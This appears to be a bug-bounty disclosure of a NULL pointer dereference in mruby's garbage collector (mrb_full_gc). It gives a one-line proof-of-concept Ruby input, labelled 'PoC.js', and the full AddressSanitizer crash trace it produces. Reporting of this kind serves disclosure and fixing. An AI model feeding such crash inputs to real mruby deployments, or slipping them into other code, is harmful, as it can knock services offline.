NULL Pointer Dereference in mruby/mruby
Valid
Reported on
Oct 8th 2021
Description
NULL Pointer Dereference on mrb_full_gc
Proof of Concept
// PoC.js
def lambda = super { } [lambda] = @a ... ; lambda
Result
~/asan/mruby/bin/mruby crash.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==354==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x556c5e8ddf2f bp 0x7ffe9a8ca4a0 sp 0x7ffe9a8ca480 T0)
==354==The signal is caused by a READ memory access.
==354==Hint: address points to the zero page.
#0 0x556c5e8ddf2e in mrb_full_gc /root/asan/mruby/src/gc.c:1325
#1 0x556c5e8de256 in mrb_garbage_collect /root/asan/mruby/src/gc.c:1358
#2 0x556c5e8b58c7 in mrb_irep_incref /root/asan/mruby/src/state.c:114
#3 0x556c5e965fd1 in mrb_proc_copy /root/asan/mruby/src/proc.c:212
#4 0x556c5e966929 in proc_lambda /root/asan/mruby/src/proc.c:283
#5 0x556c5e91fbb7 in mrb_vm_exec /root/asan/mruby/src/vm.c:1725
#6 0x556c5e9112fb in mrb_vm_run /root/asan/mruby/src/vm.c:1032
#7 0x556c5e9534d1 in mrb_top_run /root/asan/mruby/src/vm.c:2998
#8 0x556c5e9ad4a0 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6891
#9 0x556c5e9ad78e in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6934
#10 0x556c5e8b5092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
#11 0x7fd1ded600b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#12 0x556c5e8b242d in _start (/root/asan/mruby/bin/mruby+0xbd42d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/src/gc.c:1325 in mrb_full_gc
==354==ABORTING
We have contacted a member of the
mruby
team and are waiting to hear back
a year ago
to join this conversation